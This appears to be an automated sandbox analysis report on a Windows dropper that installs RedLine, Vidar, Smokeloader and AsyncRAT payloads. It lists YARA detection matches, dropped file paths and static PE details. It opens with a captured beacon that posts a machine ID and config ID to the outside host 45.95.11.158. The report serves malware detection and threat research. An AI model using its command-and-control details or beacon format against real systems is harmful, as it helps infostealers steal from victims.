HTTP traffic detected: POST / HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: mozzzzzzzzzzzHost: 45.95.11.158Content-Length: 94Connection: Keep-AliveCache-Control: no-cacheData Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 68 61 72 64 7a 26 63 6f 6e 66 69 67 49 64 3d 37 36 34 32 36 63 33 66 33 36 32 66 35 61 34 37 61 34 36 39 66 30 65 39 64 38 62 63 33 65 65 66 Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=76426c3f362f5a47a469f0e9d8bc3eef

Source: unknown	HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.22.0.232:443 -> 192.168.2.3:49924 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49925 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49938 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: SETUP_~1.EXE PID: 7912, type: MEMORYSTR

Source: kukurzka9000.exe, 00000012.00000002.395214421.00000000007EA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 21.0.namdoitntn.exe.9f0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 21.0.namdoitntn.exe.9f0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 26.0.brokerius.exe.b60000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 23.0.real.exe.d0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 26.2.brokerius.exe.b60000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 29.0.me.exe.cf0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 24.0.safert44.exe.fa0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 24.0.safert44.exe.fa0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 25.0.jshainx.exe.a90000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 25.0.jshainx.exe.a90000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 0.3.9n6ctoq7cn.exe.2a0d014.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 23.2.real.exe.d0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 29.2.me.exe.cf0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 0.3.9n6ctoq7cn.exe.2a0d014.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 0000001D.00000000.406600715.0000000000D23000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 00000017.00000000.382727535.0000000000104000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 00000000.00000003.301588372.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 00000017.00000002.460179149.0000000000104000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 00000019.00000000.391784055.0000000000AA3000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000018.00000000.386223308.0000000000FA2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 0000000F.00000002.466370308.00000000005F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001A.00000000.395822008.0000000000B94000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 0000001D.00000002.693545020.0000000000D23000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: 00000015.00000000.380265501.00000000009F2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: 0000001A.00000002.637138430.0000000000B94000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: Process Memory Space: real.exe PID: 8684, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: Process Memory Space: brokerius.exe PID: 8968, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: Process Memory Space: me.exe PID: 9172, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: C:\Program Files (x86)\Company\NewProduct\me.exe, type: DROPPED	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: C:\Program Files (x86)\Company\NewProduct\real.exe, type: DROPPED	Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, type: DROPPED	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, type: DROPPED	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, type: DROPPED	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, type: DROPPED	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd Author: unknown

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_00426000		15_2_00426000
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_00425220		15_2_00425220

Source: 9n6ctoq7cn.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9n6ctoq7cn.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ordo_sec666.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ordo_sec666.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ordo_sec666.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F0geI.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F0geI.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F0geI.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F0geI.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F0geI.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F0geI.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F0geI.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: F0geI.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: kukurzka9000.exe.0.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: captain09876.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: captain09876.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: captain09876.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: sqlite3.dll.15.dr

Static PE information: Number of sections : 18 > 10

Source: 9n6ctoq7cn.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 21.0.namdoitntn.exe.9f0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 21.0.namdoitntn.exe.9f0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 26.0.brokerius.exe.b60000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 23.0.real.exe.d0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 26.2.brokerius.exe.b60000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 29.0.me.exe.cf0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 24.0.safert44.exe.fa0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 24.0.safert44.exe.fa0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 25.0.jshainx.exe.a90000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 25.0.jshainx.exe.a90000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 0.3.9n6ctoq7cn.exe.2a0d014.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 23.2.real.exe.d0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 29.2.me.exe.cf0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 0.3.9n6ctoq7cn.exe.2a0d014.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 0000001D.00000000.406600715.0000000000D23000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 00000017.00000000.382727535.0000000000104000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 00000000.00000003.301588372.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 00000017.00000002.460179149.0000000000104000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 00000019.00000000.391784055.0000000000AA3000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000018.00000000.386223308.0000000000FA2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 0000000F.00000002.466370308.00000000005F8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001A.00000000.395822008.0000000000B94000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 0000001D.00000002.693545020.0000000000D23000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 00000015.00000000.380265501.00000000009F2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 0000001A.00000002.637138430.0000000000B94000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 0000001C.00000003.455099291.00000000023BA000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
Source: Process Memory Space: real.exe PID: 8684, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: Process Memory Space: brokerius.exe PID: 8968, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: Process Memory Space: me.exe PID: 9172, type: MEMORYSTR	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: C:\Program Files (x86)\Company\NewProduct\me.exe, type: DROPPED	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: C:\Program Files (x86)\Company\NewProduct\real.exe, type: DROPPED	Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, type: DROPPED	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, type: DROPPED	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, type: DROPPED	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, type: DROPPED	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12

Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: String function: 022B94ED appears 112 times
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: String function: 00409F79 appears 112 times
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: String function: 004199E0 appears 34 times
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: String function: 00409F79 appears 112 times
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: String function: 0208A1E0 appears 112 times

Source: captain09876.exe.0.dr

Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, 567907 bytes, 1 file

Source: ordo_sec666.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-63057D8A-1750.pma

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@122/190@15/17

Source: C:\Users\user\Desktop\9n6ctoq7cn.exe

File read: C:\Program Files (x86)\desktop.ini

Jump to behavior

Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\9n6ctoq7cn.exe

File created: C:\Program Files (x86)\Company

Jump to behavior

Source: 9n6ctoq7cn.exe

Virustotal: Detection: 56%

Source: C:\Users\user\Desktop\9n6ctoq7cn.exe

File read: C:\Users\user\Desktop\9n6ctoq7cn.exe

Jump to behavior

Source: C:\Users\user\Desktop\9n6ctoq7cn.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\9n6ctoq7cn.exe "C:\Users\user\Desktop\9n6ctoq7cn.exe"
